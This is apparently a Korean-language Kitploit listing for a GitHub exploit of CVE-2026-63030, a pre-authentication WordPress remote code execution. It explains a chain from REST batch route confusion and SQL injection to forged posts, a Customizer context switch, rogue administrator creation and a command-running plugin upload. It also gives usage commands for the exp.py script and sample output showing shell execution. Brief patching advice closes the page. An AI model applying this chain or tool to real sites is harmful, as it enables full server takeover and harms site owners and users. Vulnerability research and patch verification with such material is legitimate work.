Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-63030 — WordPress 미인증 RCE EXP | CVE-2026-63030 | Kitploit
도구/GitHubGitHub/mhtsec/cve-2026-63030
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubmhtsec/cve-2026-63030

CVE-2026-63030

WordPress 미인증 RCE EXP | CVE-2026-63030

저장소 보기
95101개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-63030

WordPress REST API batch 라우트 혼동 + SQL 인젝션으로 인해 인증 없이 관리자 생성 → 원격 코드 실행이 가능한 전체 익스플로잇 체인 PoC입니다.

승인된 보안 테스트, 취약점 재현 및 연구용으로만 사용하십시오. 무단 대상에 대한 사용은 금지합니다.

취약점 개요

도구 다운로드
항목설명
CVECVE-2026-63030
구성 요소WordPress Core REST API (/batch/v1)
영향 버전WordPress 6.9.0 – 6.9.4, 7.0.0 – 7.0.1 (공식 공지 기준)
공격 전제 조건대상이 REST API batch를 활성화해야 하며, 사이트에 게시된 글 또는 페이지가 최소 하나 있어야 함
권한 요구 사항로그인 불필요 (Pre-Auth)
영향관리자 계정을 생성할 수 있으며, 추가로 플러그인을 업로드하여 RCE 실현 가능

공격 체인

root@kitploit:~
REST batch 路由混淆
    → author__not_in SQL 注入
    → UNION 伪造 WP_Post / oEmbed cache / Customizer changeset
    → Customizer 发布时切换为已有管理员上下文
    → REST /wp/v2/users 创建新管理员
    → 后台上传一次性插件
    → 执行系统命令

핵심은 "스택 쿼리로 데이터베이스에 쓰는 것"이 아니라 다음 과정입니다.

  1. serve_batch_request_v1()의 검증 단계와 디스패치 단계에서 $matches / $validation 인덱스가 서로 맞지 않아 route confusion이 발생합니다.
  2. 인덱스가 어긋난 뒤 문자열 형태의 author_exclude가 WP_Query의 author__not_in에 들어가 NOT IN (...)에 연결되어 SQL 인젝션이 형성됩니다.
  3. UNION SELECT로 완전한 wp_posts 행을 위조하여 oEmbed / Customizer 로직을 트리거하고, 현재 사용자 컨텍스트를 기존 관리자로 전환합니다.
  4. 관리자 권한으로 REST 사용자 생성 인터페이스를 호출해 새 관리자를 만듭니다.
  5. 백엔드에 로그인하여 플러그인을 업로드하고 명령 실행을 수행합니다.

환경 요구 사항

  • Python 3.10+ (표준 라이브러리만 사용, 서드파티 의존성 없음)
  • 대상은 테스트 권한이 있는 WordPress 인스턴스여야 함
  • 대상 PHP에는 실행 가능한 함수가 최소 하나 남아 있어야 함 (proc_open / passthru / system / shell_exec / exec / popen 중 하나)
  • disable_functions가 모든 명령 실행 함수를 비활성화한 경우에도 관리자 생성은 성공할 수 있지만, RCE 단계는 실패함

파일 설명

root@kitploit:~
CVE-2026-63030/
├── exp.py        # 完整利用脚本(单文件,零依赖)
└── README.md     # 本说明

사용 방법

가장 간단한 사용법 (관리자 자동 생성, 기본적으로 id 실행)

root@kitploit:~
python3 exp.py --url http://192.168.1.10:8080/

모든 매개변수 사용자 지정

root@kitploit:~
python3 exp.py --url http://192.168.199.134:9005/ --username mht --password 'mht666' --email [email protected] --command 'id' --timeout 60

매개변수 설명

매개변수필수기본값설명
--url예없음대상 WordPress 루트 URL
--username아니요wp2_<hex>생성할 관리자 사용자 이름
--password아니요Wp2!<random>생성할 관리자 비밀번호
--email아니요<username>@wp2shell.invalid생성할 관리자 이메일
--command / -c아니요id일회용 플러그인을 통해 실행할 명령
--timeout아니요60단일 HTTP 타임아웃(초)

예상 출력 예시

root@kitploit:~
[*] Creating administrator via SQLi -> customizer bridge...
[+] Generated administrator: labadmin
[*] Password: S3cure!pass
[*] Email: [email protected]
[*] Logging in as generated administrator...
[+] Authenticated.
[*] Uploading one-shot command plugin...
[*] Plugin path: http://192.168.1.10:8080/wp-content/plugins/lab_wp2_cmd_xxxxxxxx/lab_wp2_cmd_xxxxxxxx.php
[*] Executing command: id
[+] command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[via: proc_open]
[*] Deleting generated administrator...
[+] Generated administrator removed.
[*] Cleaning up temporary plugin...
[+] Temporary plugin removed.

스크립트는 종료 후 다음을 시도합니다:

  1. 이번에 생성한 관리자 삭제
  2. 임시 플러그인 디렉터리 삭제

중간에 실패하면 출력에 있는 계정/비밀번호를 확인하여 수동으로 정리하십시오.

주의 사항

  1. 승인된 환경에서만 사용: 무단 시스템에 사용하지 마십시오.
  2. 대상 제한: 스크립트는 기본적으로 공인 IP 리터럴 대상을 거부하며, 사설망 / 루프백 / 링크-로컬 주소 또는 도메인 형태의 대상만 허용합니다.
  3. PHP 강화: has been disabled for security reasons 메시지가 나타나면 disable_functions가 해당 함수를 비활성화한 것입니다. PoC는 여러 실행 방식을 순차적으로 시도하며, 모두 비활성화된 경우 RCE는 불가능하지만 관리자 생성 단계는 여전히 성공할 수 있습니다.
  4. 사이트 콘텐츠: oEmbed cache를 시드하려면 게시된 글 또는 페이지가 최소 하나 필요합니다.
  5. 멱등성 및 정리: 실행할 때마다 새 관리자와 임시 플러그인이 생성되며, 성공 경로에서는 자동으로 정리됩니다. 실패 시 wp-admin/users.php와 wp-content/plugins/를 수동으로 확인하십시오.

수정 권장 사항

  • 공식 수정 버전으로 업그레이드 (WordPress 공식 보안 공지 기준)
  • 패치 적용이 불가능한 경우 /batch/v1에 대한 인증되지 않은 접근을 임시로 제한
  • 프로덕션 환경에서는 disable_functions와 최소 권한의 웹 사용자 구성을 유지하여 RCE 실현 영향을 최소화

면책 조항

이 저장소의 코드는 보안 연구 및 승인된 취약점 재현 용도로만 사용됩니다. 사용자는 현지 법률 및 규정과 대상 시스템의 승인 범위를 준수하도록 스스로 확인해야 합니다. 저자는 어떠한 악용 행위에 대해서도 책임을 지지 않습니다.